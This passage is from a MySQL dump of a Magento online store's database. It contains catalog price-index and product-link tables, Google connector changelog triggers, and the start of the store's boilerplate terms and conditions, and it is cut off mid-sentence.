(2054, 0, 1, 2, 32.000000, 32.000000, 32.000000, 32.000000, NULL),
(2054, 1, 1, 2, 32.000000, 32.000000, 32.000000, 32.000000, NULL),
(2054, 2, 1, 2, 32.000000, 32.000000, 32.000000, 32.000000, NULL),
(2054, 3, 1, 2, 32.000000, 32.000000, 32.000000, 32.000000, NULL),
(2055, 0, 1, 2, 321.000000, 321.000000, 321.000000, 321.000000, NULL),
(2055, 1, 1, 2, 321.000000, 321.000000, 321.000000, 321.000000, NULL),
(2055, 2, 1, 2, 321.000000, 321.000000, 321.000000, 321.000000, NULL),
(2055, 3, 1, 2, 321.000000, 321.000000, 321.000000, 321.000000, NULL),
(2058, 0, 1, 2, 321.000000, 321.000000, 321.000000, 321.000000, NULL),
(2058, 1, 1, 2, 321.000000, 321.000000, 321.000000, 321.000000, NULL),
(2058, 2, 1, 2, 321.000000, 321.000000, 321.000000, 321.000000, NULL),
(2058, 3, 1, 2, 321.000000, 321.000000, 321.000000, 321.000000, NULL),
(2059, 0, 1, 2, 422.000000, 422.000000, 422.000000, 422.000000, NULL),
(2059, 1, 1, 2, 422.000000, 422.000000, 422.000000, 422.000000, NULL),
(2059, 2, 1, 2, 422.000000, 422.000000, 422.000000, 422.000000, NULL),
(2059, 3, 1, 2, 422.000000, 422.000000, 422.000000, 422.000000, NULL),
(2060, 0, 1, 2, 421.000000, 421.000000, 421.000000, 421.000000, NULL),
(2060, 1, 1, 2, 421.000000, 421.000000, 421.000000, 421.000000, NULL),
(2060, 2, 1, 2, 421.000000, 421.000000, 421.000000, 421.000000, NULL),
(2060, 3, 1, 2, 421.000000, 421.000000, 421.000000, 421.000000, NULL),
(2061, 0, 1, 2, 54.000000, 54.000000, 54.000000, 54.000000, NULL),
(2061, 1, 1, 2, 54.000000, 54.000000, 54.000000, 54.000000, NULL),
(2061, 2, 1, 2, 54.000000, 54.000000, 54.000000, 54.000000, NULL),
(2061, 3, 1, 2, 54.000000, 54.000000, 54.000000, 54.000000, NULL),
(2062, 0, 1, 2, 234.000000, 234.000000, 234.000000, 234.000000, NULL),
(2062, 1, 1, 2, 234.000000, 234.000000, 234.000000, 234.000000, NULL),
(2062, 2, 1, 2, 234.000000, 234.000000, 234.000000, 234.000000, NULL),
(2062, 3, 1, 2, 234.000000, 234.000000, 234.000000, 234.000000, NULL),
(2063, 0, 1, 2, 643.000000, 643.000000, 643.000000, 643.000000, NULL),
(2063, 1, 1, 2, 643.000000, 643.000000, 643.000000, 643.000000, NULL),
(2063, 2, 1, 2, 643.000000, 643.000000, 643.000000, 643.000000, NULL),
(2063, 3, 1, 2, 643.000000, 643.000000, 643.000000, 643.000000, NULL),
(2064, 0, 1, 2, 200.000000, 111.000000, 111.000000, 111.000000, NULL),
(2064, 1, 1, 2, 200.000000, 111.000000, 111.000000, 111.000000, NULL),
(2064, 2, 1, 2, 200.000000, 111.000000, 111.000000, 111.000000, NULL),
(2064, 3, 1, 2, 200.000000, 111.000000, 111.000000, 111.000000, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_price_tmp`
--

CREATE TABLE `catalog_product_index_price_tmp` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_group_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer Group ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `tax_class_id` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Tax Class ID',
  `price` decimal(20,6) DEFAULT NULL COMMENT 'Price',
  `final_price` decimal(20,6) DEFAULT NULL COMMENT 'Final Price',
  `min_price` decimal(20,6) DEFAULT NULL COMMENT 'Min Price',
  `max_price` decimal(20,6) DEFAULT NULL COMMENT 'Max Price',
  `tier_price` decimal(20,6) DEFAULT NULL COMMENT 'Tier Price'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Price Indexer Temp Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_tier_price`
--

CREATE TABLE `catalog_product_index_tier_price` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `customer_group_id` int(10) UNSIGNED NOT NULL COMMENT 'Customer Group ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `min_price` decimal(20,6) DEFAULT NULL COMMENT 'Min Price'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Tier Price Index Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_index_website`
--

CREATE TABLE `catalog_product_index_website` (
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `default_store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Default store ID for website',
  `website_date` date DEFAULT NULL COMMENT 'Website Date',
  `rate` float DEFAULT 1 COMMENT 'Rate'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Website Index Table';

--
-- Dumping data for table `catalog_product_index_website`
--

INSERT INTO `catalog_product_index_website` (`website_id`, `default_store_id`, `website_date`, `rate`) VALUES
(1, 1, '2021-06-15', 1);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_link`
--

CREATE TABLE `catalog_product_link` (
  `link_id` int(10) UNSIGNED NOT NULL COMMENT 'Link ID',
  `product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `linked_product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Linked Product ID',
  `link_type_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Link Type ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product To Product Linkage Table';

--
-- Dumping data for table `catalog_product_link`
--

INSERT INTO `catalog_product_link` (`link_id`, `product_id`, `linked_product_id`, `link_type_id`) VALUES
(1, 2064, 2057, 1),
(2, 2064, 2058, 1),
(3, 2064, 2059, 1),
(4, 2064, 2060, 1),
(5, 2064, 2061, 1),
(6, 2064, 2062, 1),
(7, 2064, 2063, 1);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_link_attribute`
--

CREATE TABLE `catalog_product_link_attribute` (
  `product_link_attribute_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Product Link Attribute ID',
  `link_type_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Link Type ID',
  `product_link_attribute_code` varchar(32) DEFAULT NULL COMMENT 'Product Link Attribute Code',
  `data_type` varchar(32) DEFAULT NULL COMMENT 'Data Type'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Link Attribute Table';

--
-- Dumping data for table `catalog_product_link_attribute`
--

INSERT INTO `catalog_product_link_attribute` (`product_link_attribute_id`, `link_type_id`, `product_link_attribute_code`, `data_type`) VALUES
(1, 1, 'position', 'int'),
(2, 4, 'position', 'int'),
(3, 5, 'position', 'int'),
(4, 3, 'position', 'int'),
(5, 3, 'qty', 'decimal');

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_link_attribute_decimal`
--

CREATE TABLE `catalog_product_link_attribute_decimal` (
  `value_id` int(10) UNSIGNED NOT NULL COMMENT 'Value ID',
  `product_link_attribute_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Product Link Attribute ID',
  `link_id` int(10) UNSIGNED NOT NULL COMMENT 'Link ID',
  `value` decimal(20,6) NOT NULL DEFAULT 0.000000 COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Link Decimal Attribute Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_link_attribute_int`
--

CREATE TABLE `catalog_product_link_attribute_int` (
  `value_id` int(10) UNSIGNED NOT NULL COMMENT 'Value ID',
  `product_link_attribute_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Product Link Attribute ID',
  `link_id` int(10) UNSIGNED NOT NULL COMMENT 'Link ID',
  `value` int(11) NOT NULL DEFAULT 0 COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Link Integer Attribute Table';

--
-- Dumping data for table `catalog_product_link_attribute_int`
--

INSERT INTO `catalog_product_link_attribute_int` (`value_id`, `product_link_attribute_id`, `link_id`, `value`) VALUES
(1, 1, 1, 1),
(2, 1, 2, 2),
(3, 1, 3, 3),
(4, 1, 4, 4),
(5, 1, 5, 5),
(6, 1, 6, 6),
(7, 1, 7, 7);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_link_attribute_varchar`
--

CREATE TABLE `catalog_product_link_attribute_varchar` (
  `value_id` int(10) UNSIGNED NOT NULL COMMENT 'Value ID',
  `product_link_attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product Link Attribute ID',
  `link_id` int(10) UNSIGNED NOT NULL COMMENT 'Link ID',
  `value` varchar(255) DEFAULT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Link Varchar Attribute Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_link_type`
--

CREATE TABLE `catalog_product_link_type` (
  `link_type_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Link Type ID',
  `code` varchar(32) DEFAULT NULL COMMENT 'Code'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Link Type Table';

--
-- Dumping data for table `catalog_product_link_type`
--

INSERT INTO `catalog_product_link_type` (`link_type_id`, `code`) VALUES
(1, 'relation'),
(3, 'super'),
(4, 'up_sell'),
(5, 'cross_sell');

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_option`
--

CREATE TABLE `catalog_product_option` (
  `option_id` int(10) UNSIGNED NOT NULL COMMENT 'Option ID',
  `product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `type` varchar(50) DEFAULT NULL COMMENT 'Type',
  `is_require` smallint(6) NOT NULL DEFAULT 1 COMMENT 'Is Required',
  `sku` varchar(64) DEFAULT NULL COMMENT 'SKU',
  `max_characters` int(10) UNSIGNED DEFAULT NULL COMMENT 'Max Characters',
  `file_extension` varchar(50) DEFAULT NULL COMMENT 'File Extension',
  `image_size_x` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Image Size X',
  `image_size_y` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Image Size Y',
  `sort_order` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Sort Order'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Option Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_option_price`
--

CREATE TABLE `catalog_product_option_price` (
  `option_price_id` int(10) UNSIGNED NOT NULL COMMENT 'Option Price ID',
  `option_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Option ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `price` decimal(20,6) NOT NULL DEFAULT 0.000000 COMMENT 'Price',
  `price_type` varchar(7) NOT NULL DEFAULT 'fixed' COMMENT 'Price Type'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Option Price Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_option_title`
--

CREATE TABLE `catalog_product_option_title` (
  `option_title_id` int(10) UNSIGNED NOT NULL COMMENT 'Option Title ID',
  `option_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Option ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `title` varchar(255) DEFAULT NULL COMMENT 'Title'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Option Title Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_option_type_price`
--

CREATE TABLE `catalog_product_option_type_price` (
  `option_type_price_id` int(10) UNSIGNED NOT NULL COMMENT 'Option Type Price ID',
  `option_type_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Option Type ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `price` decimal(20,6) NOT NULL DEFAULT 0.000000 COMMENT 'Price',
  `price_type` varchar(7) NOT NULL DEFAULT 'fixed' COMMENT 'Price Type'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Option Type Price Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_option_type_title`
--

CREATE TABLE `catalog_product_option_type_title` (
  `option_type_title_id` int(10) UNSIGNED NOT NULL COMMENT 'Option Type Title ID',
  `option_type_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Option Type ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `title` varchar(255) DEFAULT NULL COMMENT 'Title'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Option Type Title Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_option_type_value`
--

CREATE TABLE `catalog_product_option_type_value` (
  `option_type_id` int(10) UNSIGNED NOT NULL COMMENT 'Option Type ID',
  `option_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Option ID',
  `sku` varchar(64) DEFAULT NULL COMMENT 'SKU',
  `sort_order` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Sort Order'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Option Type Value Table';

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_relation`
--

CREATE TABLE `catalog_product_relation` (
  `parent_id` int(10) UNSIGNED NOT NULL COMMENT 'Parent ID',
  `child_id` int(10) UNSIGNED NOT NULL COMMENT 'Child ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Relation Table';

--
-- Dumping data for table `catalog_product_relation`
--

INSERT INTO `catalog_product_relation` (`parent_id`, `child_id`) VALUES
(2053, 2052);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_super_attribute`
--

CREATE TABLE `catalog_product_super_attribute` (
  `product_super_attribute_id` int(10) UNSIGNED NOT NULL COMMENT 'Product Super Attribute ID',
  `product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `position` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Position'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Super Attribute Table';

--
-- Dumping data for table `catalog_product_super_attribute`
--

INSERT INTO `catalog_product_super_attribute` (`product_super_attribute_id`, `product_id`, `attribute_id`, `position`) VALUES
(294, 2053, 145, 0),
(295, 2053, 93, 1);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_super_attribute_label`
--

CREATE TABLE `catalog_product_super_attribute_label` (
  `value_id` int(10) UNSIGNED NOT NULL COMMENT 'Value ID',
  `product_super_attribute_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product Super Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `use_default` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Use Default Value',
  `value` varchar(255) DEFAULT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Super Attribute Label Table';

--
-- Dumping data for table `catalog_product_super_attribute_label`
--

INSERT INTO `catalog_product_super_attribute_label` (`value_id`, `product_super_attribute_id`, `store_id`, `use_default`, `value`) VALUES
(293, 294, 0, 0, 'Size'),
(294, 295, 0, 0, 'Color');

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_super_link`
--

CREATE TABLE `catalog_product_super_link` (
  `link_id` int(10) UNSIGNED NOT NULL COMMENT 'Link ID',
  `product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `parent_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Parent ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Super Link Table';

--
-- Dumping data for table `catalog_product_super_link`
--

INSERT INTO `catalog_product_super_link` (`link_id`, `product_id`, `parent_id`) VALUES
(2099, 2052, 2053);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_website`
--

CREATE TABLE `catalog_product_website` (
  `product_id` int(10) UNSIGNED NOT NULL COMMENT 'Product ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product To Website Linkage Table';

--
-- Dumping data for table `catalog_product_website`
--

INSERT INTO `catalog_product_website` (`product_id`, `website_id`) VALUES
(1776, 1),
(2052, 1),
(2053, 1),
(2054, 1),
(2055, 1),
(2057, 1),
(2058, 1),
(2059, 1),
(2060, 1),
(2061, 1),
(2062, 1),
(2063, 1),
(2064, 1);

--
-- Triggers `catalog_product_website`
--
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_website_after_delete` AFTER DELETE ON `catalog_product_website` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_remove_cl` (`entity_id`) VALUES (OLD.`product_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_website_after_insert` AFTER INSERT ON `catalog_product_website` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_remove_cl` (`entity_id`) VALUES (NEW.`product_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_catalog_product_website_after_update` AFTER UPDATE ON `catalog_product_website` FOR EACH ROW BEGIN
IF (NOT(NEW.`product_id` <=> OLD.`product_id`) OR NOT(NEW.`website_id` <=> OLD.`website_id`)) THEN INSERT IGNORE INTO `scconnector_google_remove_cl` (`entity_id`) VALUES (NEW.`product_id`); END IF;
END
$$
DELIMITER ;

-- --------------------------------------------------------

--
-- Table structure for table `catalog_url_rewrite_product_category`
--

CREATE TABLE `catalog_url_rewrite_product_category` (
  `url_rewrite_id` int(10) UNSIGNED NOT NULL COMMENT 'url_rewrite_id',
  `category_id` int(10) UNSIGNED NOT NULL COMMENT 'category_id',
  `product_id` int(10) UNSIGNED NOT NULL COMMENT 'product_id'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='url_rewrite_relation';

--
-- Dumping data for table `catalog_url_rewrite_product_category`
--

INSERT INTO `catalog_url_rewrite_product_category` (`url_rewrite_id`, `category_id`, `product_id`) VALUES
(854, 8, 2054),
(853, 6, 2054),
(856, 4, 2055),
(857, 43, 2055),
(865, 4, 2057),
(866, 6, 2057),
(869, 43, 2057),
(874, 4, 2058),
(876, 6, 2058),
(875, 43, 2058),
(883, 6, 2059),
(882, 43, 2059),
(886, 46, 2060),
(901, 46, 2061),
(900, 4, 2061),
(902, 6, 2061),
(906, 46, 2062),
(908, 46, 2063),
(912, 46, 2064),
(911, 4, 2064);

-- --------------------------------------------------------

--
-- Table structure for table `checkout_agreement`
--

CREATE TABLE `checkout_agreement` (
  `agreement_id` int(10) UNSIGNED NOT NULL COMMENT 'Agreement ID',
  `name` varchar(255) DEFAULT NULL COMMENT 'Name',
  `content` text DEFAULT NULL COMMENT 'Content',
  `content_height` varchar(25) DEFAULT NULL COMMENT 'Content Height',
  `checkbox_text` text DEFAULT NULL COMMENT 'Checkbox Text',
  `is_active` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Is Active',
  `is_html` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Is Html',
  `mode` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Applied mode'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Checkout Agreement';

--
-- Dumping data for table `checkout_agreement`
--

INSERT INTO `checkout_agreement` (`agreement_id`, `name`, `content`, `content_height`, `checkbox_text`, `is_active`, `is_html`, `mode`) VALUES
(1, 'Terms and Conditions', 'OVERVIEW\r\nThis website is operated by bismoy Deal. Throughout the site, the terms “we”, “us” and “our” refer to bismoy Deal. bismoy Deal offers this website, including all information, tools and services available from this site to you, the user, conditioned upon your acceptance of all terms, conditions, policies and notices stated here.\r\n\r\nBy visiting our site and/ or purchasing something from us, you engage in our “Service” and agree to be bound by the following terms and conditions (“Terms of Service”, “Terms”), including those additional terms and conditions and policies referenced herein and/or available by hyperlink. These Terms of Service apply to all users of the site, including without limitation users who are browsers, vendors, customers, merchants, and/ or contributors of content.\r\n\r\nPlease read these Terms of Service carefully before accessing or using our website. By accessing or using any part of the site, you agree to be bound by these Terms of Service. If you do not agree to all the terms and conditions of this agreement, then you may not access the website or use any services. If these Terms of Service are considered an offer, acceptance is expressly limited to these Terms of Service.\r\n\r\nAny new features or tools which are added to the current store shall also be subject to the Terms of Service. You can review the most current version of the Terms of Service at any time on this page. We reserve the right to update, change or replace any part of these Terms of Service by posting updates and/or changes to our website. It is your responsibility to check this page periodically for changes. Your continued use of or access to the website following the posting of any changes constitutes acceptance of those changes.\r\n\r\nSECTION 1 - ONLINE STORE TERMS\r\nBy agreeing to these Terms of Service, you represent that you are at least the age of majority in your state or province of residence, or that you are the age of majority in your state or province of residence and you have given us your consent to allow any of your minor dependents to use this site.\r\n\r\nYou may not use our products for any illegal or unauthorized purpose nor may you, in the use of the Service, violate any laws in your jurisdiction (including but not limited to copyright laws).\r\n\r\nYou must not transmit any worms or viruses or any code of a destructive nature.\r\n\r\nA breach or violation of any of the Terms will result in an immediate termination of your Services.\r\n\r\n\r\nSECTION 2 - GENERAL CONDITIONS\r\nWe reserve the right to refuse service to anyone for any reason at any time.\r\n\r\nYou understand that your content (not including credit card information), may be transferred unencrypted and involve (a) transmissions over various networks; and (b) changes to conform and adapt to technical requirements of connecting networks or devices. Credit card information is always encrypted during transfer over networks.\r\n\r\nYou agree not to reproduce, duplicate, copy, sell, resell or exploit any portion of the Service, use of the Service, or access to the Service or any contact on the website through which the service is provided, without express written permission by us.\r\n\r\nThe headings used in this agreement are included for convenience only and will not limit or otherwise affect these Terms.\r\n\r\n\r\nSECTION 3 - ACCURACY, COMPLETENESS AND TIMELINESS OF INFORMATION\r\nWe are not responsible if information made available on this site is not accurate, complete or current. The material on this site is provided for general information only and should not be relied upon or used as the sole basis for making decisions without consulting primary, more accurate, more complete or more timely sources of information. Any reliance on the material on this site is at your own risk.\r\n\r\nThis site may contain certain historical information. Historical information, necessarily, is not current and is provided for your reference only. We reserve the right to modify the contents of this site at any time, but we have no obligation to update any information on our site. You agree that it is your responsibility to monitor changes to our site.\r\n\r\n\r\nSECTION 4 - MODIFICATIONS TO THE SERVICE AND PRICES\r\nPrices for our products are subject to change without notice.\r\n\r\nWe reserve the right at any time to modify or discontinue the Service (or any part or content thereof) without notice at any time.\r\n\r\nWe shall not be liable to you or to any third-party for any modification, price change, suspension or discontinuance of the Service.\r\n\r\n\r\nSECTION 5 - PRODUCTS OR SERVICES (if applicable)\r\nCertain products or services may be available exclusively online through the website. These products or services may have limited quantities and are subject to return or exchange only according to our Return Policy.\r\n\r\nWe have made every effort to display as accurately as possible the colors and images of our products that appear at the store. We cannot guarantee that your computer monitor\'s display of any color will be accurate.\r\n\r\nWe reserve the right, but are not obligated, to limit the sales of our products or Services to any person, geographic region or jurisdiction. We may exercise this right on a case-by-case basis. We reserve the right to limit the quantities of any products or services that we offer. All descriptions of products or product pricing are subject to change at anytime without notice, at the sole discretion of us. We reserve the right to discontinue any product at any time. Any offer for any product or service made on this site is void where prohibited.\r\n\r\nWe do not warrant that the quality of any products, services, information, or other material purchased or obtained by you will meet your expectations, or that any errors in the Service will be corrected.\r\n\r\n\r\nSECTION 6 - ACCURACY OF BILLING AND ACCOUNT INFORMATION\r\nWe reserve the right to refuse any order you place with us. We may, in our sole discretion, limit or cancel quantities purchased per person, per household or per order. These restrictions may include orders placed by or under the same customer account, the same credit card, and/or orders that use the same billing and/or shipping address. In the event that we make a change to or cancel an order, we may attempt to notify you by contacting the e-mail and/or billing address/phone number provided at the time the order was made. We reserve the right to limit or prohibit orders that, in our sole judgment, appear to be placed by dealers, resellers or distributors.\r\n\r\nYou agree to provide current, complete and accurate purchase and account information for all purchases made at our store. You agree to promptly update your account and other information, including your email address and credit card numbers and expiration dates, so that we can complete your transactions and contact you as needed.\r\n\r\nFor more detail, please review our Returns Policy.\r\n\r\n\r\nSECTION 7 - OPTIONAL TOOLS\r\nWe may provide you with access to third-party tools over which we neither monitor nor have any control nor input.\r\n\r\nYou acknowledge and agree that we provide access to such tools ”as is” and “as available” without any warranties, representations or conditions of any kind and without any endorsement. We shall have no liability whatsoever arising from or relating to your use of optional third-party tools.\r\n\r\nAny use by you of optional tools offered through the site is entirely at your own risk and discretion and you should ensure that you are familiar with and approve of the terms on which tools are provided by the relevant third-party provider(s).\r\n\r\nWe may also, in the future, offer new services and/or features through the website (including, the release of new tools and resources). Such new features and/or services shall also be subject to these Terms of Service.\r\n\r\n\r\nSECTION 8 - THIRD-PARTY LINKS\r\nCertain content, products and services available via our Service may include materials from third-parties.\r\n\r\nThird-party links on this site may direct you to third-party websites that are not affiliated with us. We are not responsible for examining or evaluating the content or accuracy and we do not warrant and will not have any liability or responsibility for any third-party materials or websites, or for any other materials, products, or services of third-parties.\r\n\r\nWe are not liable for any harm or damages related to the purchase or use of goods, services, resources, content, or any other transactions made in connection with any third-party websites. Please review carefully the third-party\'s policies and practices and make sure you understand them before you engage in any transaction. Complaints, claims, concerns, or questions regarding third-party products should be directed to the third-party.\r\n\r\n\r\nSECTION 9 - USER COMMENTS, FEEDBACK AND OTHER SUBMISSIONS\r\nIf, at our request, you send certain specific submissions (for example contest entries) or without a request from us you send creative ideas, suggestions, proposals, plans, or other materials, whether online, by email, by postal mail, or otherwise (collectively, \'comments\'), you agree that we may, at any time, without restriction, edit, copy, publish, distribute, translate and otherwise use in any medium any comments that you forward to us. We are and shall be under no obligation (1) to maintain any comments in confidence; (2) to pay compensation for any comments; or (3) to respond to any comments.\r\n\r\nWe may, but have no obligation to, monitor, edit or remove content that we determine in our sole discretion are unlawful, offensive, threatening, libelous, defamatory, pornographic, obscene or otherwise objectionable or violates any party’s intellectual property or these Terms of Service.\r\n\r\nYou agree that your comments will not violate any right of any third-party, including copyright, trademark, privacy, personality or other personal or proprietary right. You further agree that your comments will not contain libelous or otherwise unlawful, abusive or obscene material, or contain any computer virus or other malware that could in any way affect the operation of the Service or any related website. You may not use a false e-mail address, pretend to be someone other than yourself, or otherwise mislead us or third-parties as to the origin of any comments. You are solely responsible for any comments you make and their accuracy. We take no responsibility and assume no liability for any comments posted by you or any third-party.\r\n\r\n\r\nSECTION 10 - PERSONAL INFORMATION\r\nYour submission of personal information through the store is governed by our Privacy Policy. To view our Privacy Policy.\r\n\r\n\r\nSECTION 11 - ERRORS, INACCURACIES AND OMISSIONS\r\nOccasionally there may be information on our site or in the Service that contains typographical errors, inaccuracies or omissions that may relate to product descriptions, pricing, promotions, offers, product shipping charges, transit times and availability. We reserve the right to correct any errors, inaccuracies or omissions, and to change or update information or cancel orders if any information in the Service or on any related website is inaccurate at any time without prior notice (including after you have submitted your order).\r\n\r\nWe undertake no obligation to update, amend or clarify information in the Service or on any related website, including without limitation, pricing information, except as required by law. No specified update or refresh date applied in the Service or on any related website, should be taken to indicate that all information in the Service or on any related website has been modified or updated.\r\n\r\nSECTION 12 - PROHIBITED USES\r\nIn addition to other prohibitions as set forth in the Terms of Service, you are prohibited from using the site or its content: (a) for any unlawful purpose; (b) to solicit others to perform or participate in any unlawful acts; (c) to violate any international, federal, provincial or state regulations, rules, laws, or local ordinances; (d) to infringe upon or violate our intellectual property rights or the intellectual property rights of others; (e) to harass, abuse, insult, harm, defame, slander, disparage, intimidate, or discriminate based on gender, sexual orientation, religion, ethnicity, race, age, national origin, or disability; (f) to submit false or misleading information; (g) to upload or transmit viruses or any other type of malicious code that will or may be used in any way that will affect the functionality or operation of the Service or of any related website, other websites, or the Internet; (h) to collect or track the personal information of others; (i) to spam, phish, pharm, pretext, spider, crawl, or scrape; (j) for any obscene or immoral purpose; or (k) to interfere with or circumvent the security features of the Service or any related website, other websites, or the Internet. We reserve the right to terminate your use of the Service or any related website for violating any of the prohibited uses.\r\n\r\n\r\nSECTION 13 - DISCLAIMER OF WARRANTIES; LIMITATION OF LIABILITY\r\nWe do not guarantee, represent or warrant that your use of our service will be uninterrupted, timely, secure or error-free.\r\n\r\nWe do not warrant that the results that may be obtained from the use of the service will be accurate or reliable.\r\n\r\nYou agree that from time to time we may remove the service for indefinite periods of time or cancel the service at any time, without notice to you.\r\n\r\nYou expressly agree that your use of, or inability to use, the service is at your sole risk. The service and all products and services delivered to you through the service are (except as expressly stated by us) provided \'as is\' and \'as available\' for your use, without any representation, warranties or conditions of any kind, either express or implied, including all implied warranties or conditions of merchantability, merchantable quality, fitness for a particular purpose, durability, title, and non-infringement.\r\n\r\nIn no case shall bismoy Deal, our directors, officers, employees, affiliates, agents, contractors, interns, suppliers, service providers or licensors be liable for any injury, loss, claim, or any direct, indirect, incidental, punitive, special, or consequential damages of any kind, including, without limitation lost profits, lost revenue, lost savings, loss of data, replacement costs, or any similar damages, whether based in contract, tort (including negligence), strict liability or otherwise, arising from your use of any of the service or any products procured using the service, or for any other claim related in any way to your use of the service or any product, including, but not limited to, any errors or omissions in any content, or any loss or damage of any kind incurred as a result of the use of the service or any content (or product) posted, transmitted, or otherwise made available via the service, even if advised of their possibility. Because some states or jurisdictions do not allow the exclusion or the limitation of liability for consequential or incidental damages, in such states or jurisdictions, our liability shall be limited to the maximum extent permitted by law.\r\n\r\nSECTION 14 - INDEMNIFICATION\r\nYou agree to indemnify, defend and hold harmless 